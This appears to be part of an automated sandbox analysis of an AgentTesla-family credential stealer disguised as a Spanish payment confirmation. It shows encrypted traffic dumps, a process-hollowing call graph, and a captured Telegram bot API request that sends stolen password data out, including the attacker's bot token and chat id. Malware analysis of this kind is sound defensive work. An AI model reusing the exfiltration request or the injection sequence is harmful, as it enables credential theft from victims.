                                              2024-09-25 16:51:23 UTC4408INData Raw: 2f 49 4f 4c 6e 6a 68 52 49 74 42 6c 6f 42 59 44 35 47 43 4e 4a 52 4f 76 56 5a 4a 53 43 7a 46 69 7a 4f 39 4d 4d 4a 43 65 37 70 6a 36 43 31 73 56 4a 55 55 38 63 71 46 54 4a 4e 66 48 42 2f 7a 33 4d 35 79 6d 62 6e 36 72 6b 38 6b 6a 4e 6d 79 74 4c 2f 70 49 54 76 72 5a 43 4b 42 73 49 33 72 4a 52 6c 6a 5a 73 2b 77 53 37 2b 6f 4e 35 76 6d 55 58 6b 43 47 6d 55 4b 71 2b 67 52 6d 75 2b 55 35 6d 4e 70 63 50 4d 68 78 76 4f 72 38 32 4c 37 71 6c 49 62 47 6e 75 36 33 42 56 38 76 75 57 6e 42 77 79 62 52 59 74 44 6c 7a 7a 55 57 42 66 78 62 77 55 41 52 4a 34 4d 32 4b 30 56 58 7a 4f 46 53 59 32 55 67 56 37 4a 62 6a 2f 53 51 36 48 36 43 44 79 43 44 5a 69 75 4c 4b 39 43 38 53 7a 44 56 35 67 6b 42 2b 68 41 45 50 31 58 42 62 72 73 59 78 65 5a 4d 33 74 6e 49 41 78 79 4a 32 56 38
                                              Data Ascii: /IOLnjhRItBloBYD5GCNJROvVZJSCzFizO9MMJCe7pj6C1sVJUU8cqFTJNfHB/z3M5ymbn6rk8kjNmytL/pITvrZCKBsI3rJRljZs+wS7+oN5vmUXkCGmUKq+gRmu+U5mNpcPMhxvOr82L7qlIbGnu63BV8vuWnBwybRYtDlzzUWBfxbwUARJ4M2K0VXzOFSY2UgV7Jbj/SQ6H6CDyCDZiuLK9C8SzDV5gkB+hAEP1XBbrsYxeZM3tnIAxyJ2V8
                                              2024-09-25 16:51:23 UTC3592INData Raw: 6c 6c 2f 4a 32 4d 6d 43 61 6e 38 31 6a 73 71 50 42 4f 53 53 42 51 37 51 46 4a 76 78 43 2b 61 35 4f 6a 7a 4f 69 6f 58 6f 62 72 53 54 4a 41 65 6b 54 46 4d 36 42 53 63 51 35 54 5a 52 64 47 67 41 63 5a 35 7a 74 67 69 6f 42 4b 56 34 39 6e 32 53 45 52 75 70 32 66 4d 6e 6e 69 39 2f 38 4c 4c 4a 6e 45 49 45 57 54 6c 42 2f 51 44 6c 70 4a 73 51 77 57 46 30 62 64 41 4e 63 57 52 58 31 4d 69 48 51 34 42 54 6f 66 68 4b 4a 6a 4d 33 54 62 52 32 75 34 48 6b 48 30 30 67 4b 35 64 69 42 6c 2b 45 70 49 61 31 55 74 64 47 6d 62 52 74 33 69 38 68 6b 65 52 30 78 73 71 73 63 4a 45 33 64 46 39 52 6e 67 66 4a 69 66 73 4a 36 77 78 6d 51 78 4c 5a 6f 68 73 69 31 45 66 50 2b 78 52 67 6c 30 53 38 47 79 75 55 49 2b 69 37 2b 36 79 30 6f 34 62 6d 56 32 64 5a 68 56 78 4e 36 58 38 5a 4a 73 6e
                                              Data Ascii: ll/J2MmCan81jsqPBOSSBQ7QFJvxC+a5OjzOioXobrSTJAekTFM6BScQ5TZRdGgAcZ5ztgioBKV49n2SERup2fMnni9/8LLJnEIEWTlB/QDlpJsQwWF0bdANcWRX1MiHQ4BTofhKJjM3TbR2u4HkH00gK5diBl+EpIa1UtdGmbRt3i8hkeR0xsqscJE3dF9RngfJifsJ6wxmQxLZohsi1EfP+xRgl0S8GyuUI+i7+6y0o4bmV2dZhVxN6X8ZJsn
                                              2024-09-25 16:51:23 UTC4600INData Raw: 32 43 42 76 57 69 72 58 50 61 67 62 44 6f 34 32 7a 35 67 61 38 6b 61 37 74 4e 69 48 79 45 57 45 35 55 48 2f 36 73 64 4a 4c 49 57 6c 77 61 37 4e 49 47 4d 53 35 69 73 63 74 45 49 54 65 37 56 49 62 41 72 35 42 49 79 39 4c 50 42 70 41 47 37 5a 6c 79 74 33 56 4f 38 62 2b 42 2b 63 2f 38 53 32 48 7a 41 77 35 68 50 32 63 6f 48 47 4e 36 6c 50 4f 35 49 43 6a 72 42 70 6f 58 41 4d 63 4b 4a 4d 6d 4b 4d 59 2f 4f 35 2b 41 46 39 66 78 79 79 30 52 66 32 7a 55 79 68 70 70 43 6e 43 36 59 43 78 6d 33 37 38 55 6b 2b 6e 44 4b 6f 53 6e 45 58 33 65 56 2f 53 41 45 68 6d 72 31 4e 4a 6d 63 56 35 65 69 69 66 4a 33 73 68 2f 35 49 74 64 6a 7a 64 48 4e 37 2f 55 5a 67 71 6c 54 77 74 31 73 30 71 33 68 55 72 4f 74 47 59 77 6d 51 4e 48 7a 49 58 63 44 4b 46 36 48 6d 53 34 4e 74 57 52 32 59
                                              Data Ascii: 2CBvWirXPagbDo42z5ga8ka7tNiHyEWE5UH/6sdJLIWlwa7NIGMS5isctEITe7VIbAr5BIy9LPBpAG7Zlyt3VO8b+B+c/8S2HzAw5hP2coHGN6lPO5ICjrBpoXAMcKJMmKMY/O5+AF9fxyy0Rf2zUyhppCnC6YCxm378Uk+nDKoSnEX3eV/SAEhmr1NJmcV5eiifJ3sh/5ItdjzdHN7/UZgqlTwt1s0q3hUrOtGYwmQNHzIXcDKF6HmS4NtWR2Y
                                              2024-09-25 16:51:23 UTC3400INData Raw: 70 66 6c 34 33 4b 41 77 4d 69 4f 36 43 75 73 63 70 54 67 33 6a 46 6c 34 58 6a 64 7a 2b 38 62 59 37 52 51 6f 35 65 35 45 4c 70 49 41 53 45 4d 45 6e 68 6f 48 78 42 77 78 38 46 61 35 79 62 45 64 77 46 39 47 6b 4e 76 46 76 4f 57 61 6f 50 79 48 74 6b 4e 62 78 71 47 4c 54 72 42 36 37 47 55 43 6e 4b 69 57 58 2f 63 6e 47 31 74 6a 44 65 69 43 68 37 58 4c 78 50 49 4e 45 63 42 66 42 6b 6f 4a 53 74 52 77 48 77 36 6e 57 50 45 72 79 53 4e 4e 57 71 50 6f 2f 56 42 42 38 78 30 38 4b 54 4d 46 61 4f 39 30 6b 55 6b 68 52 52 6e 70 69 2b 4b 31 69 64 54 66 57 6a 48 31 63 46 57 58 57 4c 62 6f 63 4f 63 67 39 71 77 55 56 61 4c 73 6b 53 37 32 38 44 64 73 52 37 62 67 43 76 2f 57 38 48 71 77 63 52 35 79 35 74 69 44 37 47 4a 78 6f 61 73 39 67 34 38 75 38 38 47 36 47 47 49 39 4e 37 55
                                              Data Ascii: pfl43KAwMiO6CuscpTg3jFl4Xjdz+8bY7RQo5e5ELpIASEMEnhoHxBwx8Fa5ybEdwF9GkNvFvOWaoPyHtkNbxqGLTrB67GUCnKiWX/cnG1tjDeiCh7XLxPINEcBfBkoJStRwHw6nWPErySNNWqPo/VBB8x08KTMFaO90kUkhRRnpi+K1idTfWjH1cFWXWLbocOcg9qwUVaLskS728DdsR7bgCv/W8HqwcR5y5tiD7GJxoas9g48u88G6GGI9N7U
                                              2024-09-25 16:51:23 UTC4792INData Raw: 38 44 66 54 66 39 46 59 52 59 56 2b 41 42 62 71 4d 49 59 66 76 48 6a 63 68 35 64 75 4f 46 77 75 4d 4a 6e 55 67 4c 72 2b 61 58 4b 44 35 6e 2f 37 44 4f 76 47 43 54 61 6b 4d 4c 57 56 79 35 77 57 34 55 39 4a 78 62 4b 37 78 6c 39 4b 58 71 64 32 4d 73 6f 67 7a 49 42 75 62 68 39 71 78 69 64 48 73 74 77 62 43 6a 31 52 70 64 6e 71 39 65 50 63 6c 79 79 73 7a 47 79 74 43 67 6d 5a 30 43 67 71 4e 67 67 58 32 2b 49 4a 37 69 47 66 52 73 46 4f 6a 65 4a 4b 66 4e 37 5a 56 74 4a 41 63 4e 71 2b 34 54 2b 6b 33 53 4a 44 57 46 6e 4c 5a 75 32 58 35 76 4d 69 6c 33 64 5a 6e 65 55 54 68 6f 65 30 62 70 45 6a 6b 4e 79 72 4c 39 45 68 69 37 6d 4e 4e 70 5a 67 33 68 46 35 57 54 59 6b 43 50 44 62 37 6a 74 46 46 72 70 63 38 4d 6c 74 35 4a 67 4e 32 50 65 78 57 36 44 32 65 56 70 71 33 66 64
                                              Data Ascii: 8DfTf9FYRYV+ABbqMIYfvHjch5duOFwuMJnUgLr+aXKD5n/7DOvGCTakMLWVy5wW4U9JxbK7xl9KXqd2MsogzIBubh9qxidHstwbCj1Rpdnq9ePclyyszGytCgmZ0CgqNggX2+IJ7iGfRsFOjeJKfN7ZVtJAcNq+4T+k3SJDWFnLZu2X5vMil3dZneUThoe0bpEjkNyrL9Ehi7mNNpZg3hF5WTYkCPDb7jtFFrpc8Mlt5JgN2PexW6D2eVpq3fd
                                              2024-09-25 16:51:23 UTC3208INData Raw: 7a 53 42 48 32 72 38 4a 78 42 38 65 53 43 6d 6f 30 61 34 6a 50 34 69 69 45 55 70 56 6b 6a 54 78 47 68 32 2b 57 59 79 53 32 77 5a 33 6a 55 4e 67 31 52 35 42 67 58 57 57 33 6c 56 75 41 31 2b 41 55 54 65 4f 63 4e 6f 34 33 4d 65 49 72 53 59 64 58 41 33 6b 4a 4e 45 50 58 36 49 53 59 42 53 64 30 34 72 44 51 33 2b 54 59 69 62 44 61 6a 39 61 32 36 56 54 38 56 77 59 4a 77 2f 30 79 77 54 74 70 36 61 64 36 4e 66 66 5a 65 49 35 6e 32 63 6d 45 6d 6f 42 4d 35 49 6c 6e 2b 38 63 57 33 4f 67 4f 6f 74 32 75 57 6f 4f 66 41 52 76 61 53 65 73 37 54 6b 71 48 72 68 62 54 67 50 66 55 32 71 75 34 44 4c 6d 66 42 54 4b 4c 5a 6d 48 71 63 56 61 65 53 66 78 73 6d 6e 52 53 51 33 44 31 58 6b 64 63 58 65 68 41 33 71 45 50 57 65 58 2f 63 76 50 62 75 32 42 6a 49 79 4c 61 67 47 39 4d 49 53
                                              Data Ascii: zSBH2r8JxB8eSCmo0a4jP4iiEUpVkjTxGh2+WYyS2wZ3jUNg1R5BgXWW3lVuA1+AUTeOcNo43MeIrSYdXA3kJNEPX6ISYBSd04rDQ3+TYibDaj9a26VT8VwYJw/0ywTtp6ad6NffZeI5n2cmEmoBM5Iln+8cW3OgOot2uWoOfARvaSes7TkqHrhbTgPfU2qu4DLmfBTKLZmHqcVaeSfxsmnRSQ3D1XkdcXehA3qEPWeX/cvPbu2BjIyLagG9MIS
                                              2024-09-25 16:51:23 UTC4984INData Raw: 67 65 4c 6a 6e 43 49 69 61 4b 41 4c 70 78 4d 56 6e 6b 56 50 48 73 44 47 78 2f 62 46 75 4e 6a 2b 47 67 72 43 2f 54 4f 4a 5a 65 52 47 68 7a 59 65 6c 6f 52 6e 73 37 66 47 6a 72 38 71 44 37 2b 51 45 6f 71 35 5a 38 77 54 38 32 30 35 64 50 2f 5a 38 44 47 62 4e 6b 32 7a 78 6e 53 57 34 61 4e 64 4d 6c 44 6f 52 67 44 31 39 7a 78 33 64 43 33 6c 4a 4d 79 41 77 64 6f 4e 72 41 2b 72 59 6b 48 73 6b 36 4c 69 6d 44 66 6a 36 2b 59 69 78 74 61 52 2b 6f 6d 49 30 53 71 70 6c 44 4a 66 71 62 46 46 79 52 76 77 43 55 4a 62 65 70 52 51 52 64 6f 33 35 46 6e 47 56 73 6b 2f 41 6c 54 74 49 30 45 49 4a 4b 35 41 6e 6c 42 6a 4b 4b 52 76 4a 48 41 55 36 6d 71 75 6f 65 4f 43 33 72 59 4e 52 6f 66 6c 52 62 74 51 50 70 76 66 2b 76 75 35 58 78 71 59 75 54 52 58 41 6c 31 45 54 38 75 72 43 4c 34
                                              Data Ascii: geLjnCIiaKALpxMVnkVPHsDGx/bFuNj+GgrC/TOJZeRGhzYeloRns7fGjr8qD7+QEoq5Z8wT8205dP/Z8DGbNk2zxnSW4aNdMlDoRgD19zx3dC3lJMyAwdoNrA+rYkHsk6LimDfj6+YixtaR+omI0SqplDJfqbFFyRvwCUJbepRQRdo35FnGVsk/AlTtI0EIJK5AnlBjKKRvJHAU6mquoeOC3rYNRoflRbtQPpvf+vu5XxqYuTRXAl1ET8urCL4
                                              2024-09-25 16:51:23 UTC3016INData Raw: 4a 75 4e 4e 70 78 2f 2f 30 47 33 53 4b 39 51 56 39 67 41 59 6e 59 6f 77 6b 56 58 39 51 4d 58 56 6a 6b 4e 4f 4a 63 39 69 4c 66 4e 50 47 65 67 31 48 51 48 54 67 74 70 51 47 46 47 66 79 35 73 4d 54 32 31 2b 62 35 55 77 64 79 35 34 43 4a 6b 55 6e 2b 37 58 77 79 78 4f 77 69 5a 45 6c 4e 4e 50 63 4a 51 47 42 39 6c 73 77 67 6a 58 44 55 66 66 36 75 33 67 77 61 53 47 2b 30 32 32 53 65 77 6f 6f 46 35 44 66 6f 33 76 56 2f 6e 32 49 66 59 33 41 59 34 4d 57 70 6e 39 39 77 2b 50 6e 4d 6b 56 4e 63 70 36 59 76 74 6f 66 58 46 50 31 31 59 6f 35 6e 51 5a 49 64 54 67 65 34 4f 4e 32 57 58 2f 79 44 58 45 6c 48 6b 72 4d 36 71 70 37 48 69 4d 4e 35 70 6e 73 34 5a 48 30 44 54 56 75 44 53 79 64 77 6b 4e 51 31 31 74 54 61 67 63 34 55 4f 50 63 65 35 70 65 70 75 44 64 31 64 5a 32 71 78
                                              Data Ascii: JuNNpx//0G3SK9QV9gAYnYowkVX9QMXVjkNOJc9iLfNPGeg1HQHTgtpQGFGfy5sMT21+b5Uwdy54CJkUn+7XwyxOwiZElNNPcJQGB9lswgjXDUff6u3gwaSG+022SewooF5Dfo3vV/n2IfY3AY4MWpn99w+PnMkVNcp6YvtofXFP11Yo5nQZIdTge4ON2WX/yDXElHkrM6qp7HiMN5pns4ZH0DTVuDSydwkNQ11tTagc4UOPce5pepuDd1dZ2qx
                                              2024-09-25 16:51:23 UTC5176INData Raw: 51 70 64 61 4d 78 46 41 6b 4e 4c 52 66 51 58 68 70 71 66 68 42 7a 66 62 42 68 68 53 54 6e 49 74 6b 55 65 32 53 63 38 7a 78 73 2b 41 34 6e 71 2f 70 36 6e 54 33 77 46 56 77 51 45 4a 49 4f 75 6b 47 51 45 76 65 61 7a 54 79 66 31 49 55 64 47 2b 4e 66 4d 48 68 6e 52 50 62 57 49 36 57 75 52 6c 4b 34 2f 53 65 4c 6d 51 41 51 38 52 76 46 48 30 48 52 56 45 34 58 36 6f 50 68 38 33 78 67 49 2b 37 4f 4d 76 41 4a 34 75 5a 34 45 30 4b 51 32 63 39 37 38 5a 55 70 33 7a 52 69 2b 74 42 55 65 56 36 62 77 2b 70 61 70 39 33 63 6b 52 79 74 6f 36 53 43 42 56 7a 77 67 6d 56 4b 66 42 48 30 77 67 75 4f 70 53 4a 46 64 65 48 30 56 66 74 52 6d 70 47 6b 67 2b 4e 7a 43 45 50 56 56 64 42 68 79 6e 59 31 66 4e 43 56 53 38 65 4e 53 38 47 47 52 6f 36 5a 79 44 74 53 37 48 72 76 69 58 6b 2f 4f
                                              Data Ascii: QpdaMxFAkNLRfQXhpqfhBzfbBhhSTnItkUe2Sc8zxs+A4nq/p6nT3wFVwQEJIOukGQEveazTyf1IUdG+NfMHhnRPbWI6WuRlK4/SeLmQAQ8RvFH0HRVE4X6oPh83xgI+7OMvAJ4uZ4E0KQ2c978ZUp3zRi+tBUeV6bw+pap93ckRyto6SCBVzwgmVKfBH0wguOpSJFdeH0VftRmpGkg+NzCEPVVdBhynY1fNCVS8eNS8GGRo6ZyDtS7HrviXk/O


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.849705149.154.167.2204433780C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-25 16:51:26 UTC260OUTPOST /bot6828335029:AAHOq6iD_8Eg5u6FhmWF0NHPcKj1jLGtRk4/sendDocument HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=---------------------------8dcdd60c3a34f3c
                                              Host: api.telegram.org
                                              Content-Length: 919
                                              Expect: 100-continue
                                              Connection: Keep-Alive
                                              2024-09-25 16:51:26 UTC25INHTTP/1.1 100 Continue
                                              2024-09-25 16:51:26 UTC919OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 64 36 30 63 33 61 33 34 66 33 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 2d 34 31 36 39 34 32 31 32 33 37 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 64 36 30 63 33 61 33 34 66 33 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 39 2f 32 35 2f 32 30 32 34 20 31 32 3a 35 31 3a 32 34 0a 55 73 65
                                              Data Ascii: -----------------------------8dcdd60c3a34f3cContent-Disposition: form-data; name="chat_id"-4169421237-----------------------------8dcdd60c3a34f3cContent-Disposition: form-data; name="caption"New PW Recovered!Time: 09/25/2024 12:51:24Use
                                              2024-09-25 16:51:27 UTC1054INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Wed, 25 Sep 2024 16:51:27 GMT
                                              Content-Type: application/json
                                              Content-Length: 666
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                              {"ok":true,"result":{"message_id":214,"from":{"id":6828335029,"is_bot":true,"first_name":"originlogger","username":"Walshlogs002_bot"},"chat":{"id":-4169421237,"title":"originlogs002","type":"group","all_members_are_administrators":true},"date":1727283087,"document":{"file_name":"user-818225 2024-09-25 12-51-24.html","mime_type":"text/html","file_id":"BQACAgEAAxkDAAPWZvQ_j7eHWI2rR_0Csrz8sEXAEncAAhUFAAKr36FHfXGaTbitBjo2BA","file_unique_id":"AgADFQUAAqvfoUc","file_size":320},"caption":"New PW Recovered!\n\nTime: 09/25/2024 12:51:24\nUser Name: user/818225\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:12:51:21
                                              Start date:25/09/2024
                                              Path:C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe"
                                              Imagebase:0xb00000
                                              File size:208'896 bytes
                                              MD5 hash:5F249A857AA4EC0D7811CBE49B1EAC0E
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1461485976.0000000003F89000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1461485976.0000000003F89000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1461485976.0000000003F89000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:2
                                              Start time:12:51:23
                                              Start date:25/09/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                              Imagebase:0xd80000
                                              File size:65'440 bytes
                                              MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2696679944.000000000313E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2695484227.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2695484227.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.2695484227.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2696679944.000000000315A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2696679944.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2696679944.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.2696679944.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:high
                                              Has exited:false

                                              Disassembly

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:14.2%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:86.4%
                                                Total number of Nodes:22
                                                Total number of Limit Nodes:0
                                                execution_graph 2781 2d68eb8 2782 2d68eeb 2781->2782 2799 2d69892 2782->2799 2801 2d6869c 2782->2801 2784 2d690ce 2785 2d686a8 Wow64SetThreadContext 2784->2785 2787 2d691db 2784->2787 2785->2787 2786 2d686c0 ReadProcessMemory 2789 2d692b9 2786->2789 2787->2786 2788 2d686d8 VirtualAllocEx 2791 2d69408 2788->2791 2789->2788 2790 2d686e4 WriteProcessMemory 2798 2d69497 2790->2798 2791->2790 2792 2d696c6 2793 2d686e4 WriteProcessMemory 2792->2793 2794 2d6970c 2793->2794 2795 2d686f0 Wow64SetThreadContext 2794->2795 2800 2d697e9 2794->2800 2795->2800 2796 2d68708 ResumeThread 2796->2799 2797 2d686e4 WriteProcessMemory 2797->2798 2798->2792 2798->2797 2800->2796 2802 2d699a8 CreateProcessA 2801->2802 2804 2d69bf2 2802->2804

                                                Executed Functions

                                                Function 02D68EB8 Relevance: 1.8, Strings: 1, Instructions: 596COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 2d68eb8-2d68ee9 1 2d68ef0-2d69943 0->1 2 2d68eeb 0->2 5 2d68f88-2d690e8 call 2d61560 call 2d6869c 1->5 6 2d69949-2d69950 1->6 2->1 19 2d69127-2d69193 5->19 20 2d690ea-2d6911c call 2d615b0 5->20 28 2d69195 19->28 29 2d6919a-2d691c0 19->29 20->19 28->29 31 2d691c6-2d691d6 call 2d686a8 29->31 32 2d69270-2d6927a 29->32 36 2d691db-2d691e8 31->36 34 2d69281-2d692d3 call 2d686c0 32->34 35 2d6927c 32->35 43 2d692d5-2d69307 call 2d615b0 34->43 44 2d69312-2d6932b 34->44 35->34 38 2d6921a-2d6921c 36->38 39 2d691ea-2d69218 call 2d686b4 36->39 42 2d69222-2d69230 38->42 39->42 45 2d69232-2d69264 call 2d615b0 42->45 46 2d6926f 42->46 43->44 48 2d6939f-2d6942e call 2d686d8 44->48 49 2d6932d-2d6935f call 2d686cc 44->49 45->46 46->32 68 2d69430-2d69462 call 2d615b0 48->68 69 2d6946d-2d694b7 call 2d686e4 48->69 58 2d69361-2d69393 call 2d615b0 49->58 59 2d6939e 49->59 58->59 59->48 68->69 76 2d694f6-2d6952b 69->76 77 2d694b9-2d694eb call 2d615b0 69->77 82 2d696a4-2d696c0 76->82 77->76 84 2d696c6-2d6972c call 2d686e4 82->84 85 2d69530-2d695b7 82->85 93 2d6972e-2d69760 call 2d615b0 84->93 94 2d6976b-2d6979c 84->94 98 2d695bd-2d69634 call 2d686e4 85->98 99 2d69699-2d6969e 85->99 93->94 101 2d697a3-2d697ce 94->101 102 2d6979e 94->102 115 2d69639-2d69659 98->115 99->82 108 2d69884-2d6988d call 2d68708 101->108 109 2d697d4-2d697e4 call 2d686f0 101->109 102->101 114 2d69892-2d698b2 108->114 113 2d697e9-2d697f6 109->113 116 2d69828-2d6982a 113->116 117 2d697f8-2d69826 call 2d686fc 113->117 118 2d698b4-2d698e6 call 2d615b0 114->118 119 2d698f1-2d69927 114->119 120 2d6965b-2d6968d call 2d615b0 115->120 121 2d69698 115->121 125 2d69830-2d69844 116->125 117->125 118->119 119->6 120->121 121->99 130 2d69846-2d69878 call 2d615b0 125->130 131 2d69883 125->131 130->131 131->108
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1460765606.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2d60000_Confirmaci#U00f3n de pago_shrunk.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (
                                                • API String ID: 0-3887548279
                                                • Opcode ID: 4157badbd1aca02d687e5748cfc54edf3c0ebb9dc4ee9bffa456ec2de03030c7
                                                • Instruction ID: 438c303d7085e3388fc0a0035fa1b9bf313c7e8499767b5dff0142ab3aaed810
                                                • Opcode Fuzzy Hash: 4157badbd1aca02d687e5748cfc54edf3c0ebb9dc4ee9bffa456ec2de03030c7
                                                • Instruction Fuzzy Hash: 6352AF74E012288FDB64DF65C994BEDBBB2BB89301F1081EAD409A7395DB309E85DF50
                                                Function 02D6869C Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 140 2d6869c-2d69a40 143 2d69a42-2d69a4c 140->143 144 2d69a79-2d69a99 140->144 143->144 145 2d69a4e-2d69a50 143->145 151 2d69ad2-2d69b01 144->151 152 2d69a9b-2d69aa5 144->152 146 2d69a52-2d69a5c 145->146 147 2d69a73-2d69a76 145->147 149 2d69a60-2d69a6f 146->149 150 2d69a5e 146->150 147->144 149->149 153 2d69a71 149->153 150->149 160 2d69b03-2d69b0d 151->160 161 2d69b3a-2d69bf0 CreateProcessA 151->161 152->151 154 2d69aa7-2d69aa9 152->154 153->147 155 2d69acc-2d69acf 154->155 156 2d69aab-2d69ab5 154->156 155->151 158 2d69ab7 156->158 159 2d69ab9-2d69ac8 156->159 158->159 159->159 162 2d69aca 159->162 160->161 163 2d69b0f-2d69b11 160->163 171 2d69bf2-2d69bf8 161->171 172 2d69bf9-2d69c74 161->172 162->155 165 2d69b34-2d69b37 163->165 166 2d69b13-2d69b1d 163->166 165->161 167 2d69b21-2d69b30 166->167 168 2d69b1f 166->168 167->167 170 2d69b32 167->170 168->167 170->165 171->172 181 2d69c76-2d69c7a 172->181 182 2d69c84-2d69c88 172->182 181->182 183 2d69c7c-2d69c7f call 2d60b50 181->183 184 2d69c8a-2d69c8e 182->184 185 2d69c98-2d69c9c 182->185 183->182 184->185 187 2d69c90-2d69c93 call 2d60b50 184->187 188 2d69c9e-2d69ca2 185->188 189 2d69cac-2d69cb0 185->189 187->185 188->189 193 2d69ca4-2d69ca7 call 2d60b50 188->193 190 2d69cc2-2d69cc9 189->190 191 2d69cb2-2d69cb8 189->191 194 2d69ce0 190->194 195 2d69ccb-2d69cda 190->195 191->190 193->189 195->194
                                                APIs
                                                • CreateProcessA.KERNEL32(?,?,?,00000005,?,?,?,?,00000000,?), ref: 02D69BDD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1460765606.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2d60000_Confirmaci#U00f3n de pago_shrunk.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: 2e858c66af4d2455bd016e59779b8dc3b08e79d2720f1a3c12613fb4e0dd3061
                                                • Instruction ID: d1a20f79959667784cb20dec208031424c97886e862cd04a145b6401f61b1f57
                                                • Opcode Fuzzy Hash: 2e858c66af4d2455bd016e59779b8dc3b08e79d2720f1a3c12613fb4e0dd3061
                                                • Instruction Fuzzy Hash: 86913871D00619CFDB20CFA9C895BEEBBF2BB48314F1485AAE809A7340D7759985CF91
                                                Function 02D686E4 Relevance: 1.6, APIs: 1, Instructions: 70injectionCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
